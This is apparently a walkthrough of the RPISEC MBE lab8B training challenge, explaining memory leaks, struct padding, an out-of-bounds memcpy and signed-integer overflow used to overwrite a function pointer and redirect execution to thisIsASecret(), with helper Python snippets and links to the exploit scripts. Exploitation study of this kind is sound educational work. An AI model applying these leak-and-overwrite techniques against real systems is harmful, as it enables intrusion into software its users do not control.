Out-of-bounds read-write with some integer sign flipping - MBE LAB8B walkthrough - the basic version
I decided to skip the LAB8C (https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8C.c) writeup, as solving it did not even require running gdb - so I was like "muh".
Instead, let's look at LAB8B.
The target app
As usual, here's the source code: https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8B.c.
Compilation flags
Below are the compilation flags from the comment at the top of the source file:
However, these flags do not seem to match the actual compilation flags used to produce the /levels/lab08/lab8B binary. My conclusion is that the -fPIE -pie flags were NOT used when compiling, as the addresses in the code segment turned out to be fixed (but that's OK: we can leak memory from the program, so having them ASLR-ed would not really make things much more difficult here). Plus, there's a second (bonus) solution to this, which does not utilize those fixed addresses, but more on that later. Also, this commit https://github.com/RPISEC/MBE/commit/ad0d378e379470ebf744655234361bd303530ab4 suggests there are some discrepancies between the flags in the comments and the real compilation flags in chapter 8's labs.
The code
Below is the data structure we are going to work on:
The core logic of the program is to allow us to enterData() into the v1 and v2 structures (just the numbers and the char; the printFunc pointer is initialized with a fixed value).
We can't manually enter data into the v3 vector. Instead, v3 is filled by adding the values of the corresponding v1 and v2 fields together (sumVectors()). For this to happen, none of the v1 and v2 fields can be 0:
enterData() simply fills a vector structure with user-supplied numbers plus the vector.a char, using scanf() calls with format strings relevant to their declared types (signed/unsigned). The vector.a char is an exception to this, as it is read from stdin with a getchar() call:
This is our user interface:
And this is how our user interface is connected to methods:
Now, the most important method:
How v.printFunc pointers are initialized + what printVector() does
By default, all printFunc pointers point at printf():
When enterData() is called, v.printFunc is overwritten with the printVector() address:
This means that asking the program to print a vector before we even enter it would make it call printf() on a still-empty vector. The only initialized field would be printFunc, containing the current libc printf() address. So yeah, this is the first vulnerability, but it's not the only leak in this app.
The second leak is a feature of the program itself, implemented in the printVector() function:
So we can leak the printVector() address, the libc printf() address, as well as the address of the v vector in the data segment.
The following simple exploit skeleton extracts both of the leaks:
https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_leak.py
The out-of-bounds-read-write
So, this is the vulnerability we are after:
We can allocate and copy up to MAX_FAVS (10) versions of v3 (it can be the same v3 without making any changes to it) to the faves[] array.
The first fave (faves[0]) is a proper byte-to-byte copy of v3, because i is 0 at the time. The issue starts to manifest itself as i grows. So, a careful pick of the sum constituents (the relevant corresponding v1 and v2 fields) along with the right choice of an i value from within the 0-9 range should allow us to arbitrarily overwrite the printFunc pointer in at least one of the faves. Then we load it back to either v1 or v2 and task the program to print it.
But before we get ahead of ourselves, let's clarify a few basic things first.
Sizes and paddings - how data is aligned in memory
In this case it seems like a good idea to start with checking the size of the struct vector structure, as well as its individual members. We also need to expect some padding (we're in a 32-bit world here, so the space eventually reserved for an object will be rounded up to a multiple of 4).
Over the course of my work on this challenge, I compiled a few small C programs to test some stuff the easy way, here's one of them:
The output:
So we know that in our system (MBE VM) both int and long int have the same size. We also know the entire size of the struct vector = 44.
Since both long longs take 8+8 (16) and the four integers take 4+4+4+4 (16), that's already 32. We also know that the printFunc pointer will take 4 bytes, making it 36. So, we have 8 more bytes occupied by two short integers and one char. This makes sense as short integers are two-byte variables, so 4 bytes are needed to contain two of them (making it all 40 so far). A single char takes only one byte (making it 41), so three more bytes of padding are required to attain the nearest multiple of 4 (44).
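To double-check the arithmetic above, here is a minimal sketch that adds the member sizes up in Python. The field order and the exact placement of the padding bytes are my assumptions, inferred from the memory dumps discussed later in this walkthrough rather than copied from lab8B.c, so treat it as an illustration only.

```python
import struct

# ASSUMED i386 layout of struct vector (field order inferred from the
# walkthrough, not copied from lab8B.c). "x" marks one padding byte.
FIELDS = [
    ("printFunc", "I"),  # 4-byte function pointer
    ("a", "c"),          # char
    ("pad_a", "x"),      # 1 byte so that b is 2-byte aligned
    ("b", "h"),          # short
    ("c", "H"),          # unsigned short
    ("pad_c", "xx"),     # 2 bytes so that d is 4-byte aligned
    ("d", "i"),          # int
    ("e", "I"),          # unsigned int
    ("f", "i"),          # long (4 bytes on this target)
    ("g", "I"),          # unsigned long
    ("h", "q"),          # long long
    ("i", "Q"),          # unsigned long long
]


def layout(fields):
    """Return ({name: (offset, size)}, total_size) for a gap-free little-endian layout."""
    offsets, pos = {}, 0
    for name, code in fields:
        size = struct.calcsize("<" + code)
        offsets[name] = (pos, size)
        pos += size
    return offsets, pos


OFFSETS, TOTAL = layout(FIELDS)

if __name__ == "__main__":
    for name, (off, size) in OFFSETS.items():
        print(f"{name:10s} offset={off:2d} size={size}")
    print("sizeof(struct vector) =", TOTAL)
```

Under these assumptions the three padding bytes are not all at the end: one sits right after a and two sit after c, which is why d starts at byte offset 12.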
But let's see what this actually looks like in memory. For this purpose, I created a skeleton of the exploit, simply filling the particular structure fields with a set of values making them easy to distinguish:
The text version is here: https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_init_bare.py
A note about libc output buffering
When using pwnlib (pwntools), I highly recommend the additional stdin=PTY argument for the process() call (it can save you a lot of frustration when the output you expect from the target app does not arrive and you have the impression that the program hung). This particular challenge made me learn the hard way that by default pwnlib uses a pipe (not a PTY) as the standard input of the process it spawns. This means that the target application does not recognize its standard output as an active device (PTY), which would otherwise prevent libc from buffering data coming from its output routines like printf(). Some more details here: https://twitter.com/julianpentest/status/1143386259164938240.
Anyway, back to our memory alignment inspection. Running it (you might want to cp /levels/lab08/lab8B /tmp first):
Second console (for this, /proc/sys/kernel/yama/ptrace_scope needs to be set to 0 - I keep it this way on the MBE VM as it's efficient):
And here are the v1 contents after enterData() (easy to attach and see when the program is waiting for input here, no breakpoints needed):
A slightly closer look:
Adding vectors
OK, now let's get two vectors summed, while trying to pick the v1 and v2 fields in such a way that we get the expected values in the v3 fields.
So, let's say we want our v3 sum to consist of consecutive capital letters, 'A', 'B', 'C' and so on.
This will make it easy to distinguish which bytes of the v3 vector are being copied to which bytes of the particular faves[i] structure, as the i offset grows.
As our v3 has to come from a sum of non-zero values, we will simply fill the first vector with growing natural numbers, starting at 0x1, while filling all the fields in the second vector with 0x40-s.
We can achieve 0x40 in particular memory cells by putting the following values in, depending on the type:
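As a rough illustration of where such values come from, the sketch below derives, for each field width, the integer whose every byte is 0x40. The widths are assumptions matching the 32-bit target described earlier; the char itself would simply be entered as the '@' character (0x40).

```python
def repeated_byte(byte, width):
    """Integer whose `width` bytes all equal `byte` (e.g. 0x40404040 for width 4)."""
    return int.from_bytes(bytes([byte]) * width, "little")


# Field widths in bytes, ASSUMING the 32-bit target (int and long are both 4 bytes).
WIDTHS = {"char": 1, "short": 2, "int": 4, "long long": 8}

# Decimal values to type into the scanf() prompts for the second vector.
FILL = {name: repeated_byte(0x40, width) for name, width in WIDTHS.items()}

if __name__ == "__main__":
    for name, value in FILL.items():
        print(f"{name:10s} {value:#x} = {value}")
```

All of these are positive and fit the signed variant of their type, so the same number works for both the signed and the unsigned field of a given width.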
And here we go (again, full text version can be found here https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_test_sum.py):
And here we have it:
Due to our v1 values being very small (0x1 and up), the more-significant bytes of those values were nulls, producing 0x40 (no change) in v3 when summed with the more-significant bytes of their v2 counterparts. Fair enough, now we have a basic understanding of how to manipulate v3 and therefore faves[i].
Options for execution control
Now, the best way to see our options here is to simply use the v3 contents we already have, add it to favorites 10 times or less (as we can't do more) and examine the resulting faves[i].printFunc pointer. Once we identify and pick the most favorable offset (the value of i that allows us to fully control the pointer with any of the v3 fields), we'll pick the proper v1 and v2 values once again so their sum is what we want and exploit it. Having the proper i, we know how many times our v3 has to be added to favorites, as well as which favorite number we want to ask the program to print in order to execute code from our arbitrarily provided address.
I initially thought that incrementing i by 1 in the vulnerable memcpy() call would result in the pointer address being incremented by one byte as well.
Debugging, however, revealed that the expression is evaluated with the variable type being a pointer to int (which is 4 bytes), hence consecutive increments of i will make the memcpy() source argument point at further and further whole dwords (double words, 4-byte chunks) of the current v3 contents.
Here's how faves[] changes with every single fave() call:
So, for i=0, faves[0] is a complete copy of v3.
Now, after a second fave() call, i=1:
Yes, the second fave already has its printFunc pointer fully overwritten with data from our input (0x40420041)! So with every new favorite added, the byte offset of the out-of-bounds read-write will effectively move by 4.
As we can see, i=1 is not sufficient for our desired pointer overwrite, because we cannot control the nullbyte (as opposed to every other byte) in the 0x40420041 value (that nullbyte comes from the char v3.a padding - beyond our control). The whole value contains v3.a with padding (two least significant bytes) and short int v3.b (two most significant bytes).
The next offset (i=2, faves[2]) is even worse, as we would have the unsigned short int v3.c being our new pointer (0x00004043 at the time of taking the above screenshot), which in turn has two padding nullbytes we cannot control:
Offset i=3 does the trick (gives us full control over the pointer).
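The shifting window can be reproduced offline. The following sketch packs the v3 test contents into 44 bytes and reads the dword that would land in faves[i].printFunc for a given i. The struct layout and the values of the fields after d are my assumptions (they just continue the pattern); only a, b, c and d are taken from the dumps described above.

```python
import struct

# v3 as seen in the walkthrough: a=0x41, b=0x4042, c=0x4043, d=0x40404044.
# The layout and the values of e..i are ASSUMPTIONS that continue the pattern.
V3 = struct.pack(
    "<IBxhHxxiIiIqQ",
    0x0,                                             # printFunc placeholder
    0x41, 0x4042, 0x4043,                            # a, b, c
    0x40404044, 0x40404045, 0x40404046, 0x40404047,  # d, e, f, g
    0x4040404040404048, 0x4040404040404049,          # h, i
)


def fave_printfunc(v3_bytes, i):
    """Dword that ends up in faves[i].printFunc when the copy starts i ints into v3."""
    start = 4 * i  # pointer arithmetic on an int pointer moves in 4-byte steps
    return struct.unpack_from("<I", v3_bytes, start)[0]


if __name__ == "__main__":
    for i in range(1, 5):
        print(f"i={i}: faves[{i}].printFunc = {fave_printfunc(V3, i):#010x}")
```

With these inputs the sketch yields 0x40420041 for i=1, 0x00004043 for i=2 and 0x40404044 for i=3, matching the values observed in the debugger.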
One more thing. We can't ask the program to directly call any of the faves[i].printFunc. Instead, we must load the particular favorite into one of the two work vectors (v1 or v2), then print it.
And:
It looks like we're almost there.
The basic solution (without bonus points)
There's one more important code section I did not mention:
Long story short, the basic solution is to now pick our input in such a way that instead of 0x40404044, faves[3].printFunc contains the address of thisIsASecret().
Normally we would calculate the thisIsASecret() function's address based on the already leaked printVector() address:
But due to the missing -fPIE -pie flags this is not required. The address is simply 0x800010a7.
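For a build where the code segment does move, the leak-based calculation mentioned above could look roughly like the sketch below. The 0x10a7 offset comes from this walkthrough; PRINT_VECTOR_OFFSET is a made-up placeholder (I am not quoting the real value here), so read the actual offset from the binary before using anything like this.

```python
THIS_IS_A_SECRET_OFFSET = 0x10A7  # offset quoted in this walkthrough
PRINT_VECTOR_OFFSET = 0x10E9      # HYPOTHETICAL placeholder, NOT the real offset


def secret_from_leak(print_vector_leak):
    """Rebase thisIsASecret() onto wherever printVector() was actually loaded."""
    image_base = print_vector_leak - PRINT_VECTOR_OFFSET
    return (image_base + THIS_IS_A_SECRET_OFFSET) & 0xFFFFFFFF


if __name__ == "__main__":
    # What a printVector() leak would look like with the image based at 0x80000000.
    leak = 0x80000000 + PRINT_VECTOR_OFFSET
    print(hex(secret_from_leak(leak)))
```

The point is only that the distance between two functions in the same image stays constant, so one leaked code pointer is enough to locate the other.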
The problem with signs
Knowing that 0x800010a7 is 2147487911 in decimal, I simply tried to split it between v1.d and v2.d values as 2147487910 and 1.
This did not work, because d is a signed integer, with a possible value range of -2147483648 to 2147483647. Both 2147487911 and 2147487910 are slightly above that range. When such a value is provided to scanf("%d", &(v->d));, it ends up clamped to the maximum value of 0x7fffffff to avoid integer overflow.
0x7fffffff is 2147483647, while 0x80000000 is -2147483648. This means that our desired pointer is a negative number and we cannot achieve int overflows with scanf().
The arithmetic overflow, however, is entirely feasible when the values get added in the sumVectors() function. So v1.d = 2147487910 ended up as 0x7fffffff, which summed with 0x1 made the value 0x80000000. Quite close, but not what we want.
There are several solutions to this:
- stick to the values we already picked and just overflow the sum even more by setting v2.d to the 0x10a7 offset + 1, so that v1.d = 0x7fffffff plus v2.d = 0x10a7 + 1 becomes 0x800010a7, or just pick some two static numbers that lead to the result we want (the simple and ugly solution, not to mention lazy as well)
- dynamically leak the target value as a signed integer, using pwnlib's unpacking functions (e.g. number = u32(leak[0x0:0x4],sign="signed")) to get the value of the pointer interpreted as a signed integer, use it as the v1.d input while putting the required calculation offset (e.g. the difference between printVector() and thisIsASecret() or the difference between system() and printf()) as v2.d, flipping the signs if needed, depending on whether the initial value is negative
- dynamically leak and calculate the target value treating it as unsigned, then split it in half (e.g. for target 2147487911 that would be 1073743955 and 1073743956 for the v1.d and v2.d inputs, respectively), so both inputs are within the signed int range for scanf() and still good for the overflow (smart, reliable and quite easy solution)
- simply use the next offset i=4 instead of i=3, because v.e is an unsigned integer, so we get rid of the problem entirely (lazy and neat solution)
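The signed-reinterpretation and split-in-half ideas from the list above can be sketched without pwnlib, using only the standard library. The helper names are mine and purely illustrative; the range check reflects the constraints already discussed (both inputs must be non-zero and fit a signed int).

```python
import struct

INT_MAX = 2**31 - 1


def as_signed32(value):
    """Reinterpret a 32-bit pattern as a signed int (what a signed unpack would return)."""
    return struct.unpack("<i", struct.pack("<I", value & 0xFFFFFFFF))[0]


def split_in_half(target):
    """Split an unsigned 32-bit target into two scanf("%d")-friendly addends."""
    low = target // 2
    high = target - low
    if low == 0 or high > INT_MAX:
        raise ValueError("target cannot be split into two non-zero signed ints")
    return low, high


def wraps_to(x, y):
    """Bit pattern of x + y after 32-bit wraparound."""
    return (x + y) & 0xFFFFFFFF


if __name__ == "__main__":
    target = 0x800010A7
    print(as_signed32(target))
    low, high = split_in_half(target)
    print(low, high, hex(wraps_to(low, high)))
```

The split works for almost every 32-bit target; the check only rejects the edge cases where one half would be zero or the larger half would exceed the signed maximum.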
Thus, overflowing it even more with statically picked values could go like this:
Knowing that:
- 0x80000000 is -2147483648 (the bottom of the signed int range)
- 0x800010a7 is the thisIsASecret() address
- 0x10a7 is the thisIsASecret() offset (4263 decimal)
we can pick 4263 and -2147483648 as v1.d and v2.d:
The full exploit code (basic non-bonus version)
https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_working_simple_and_ugly.py
The bonus version will follow in the second part.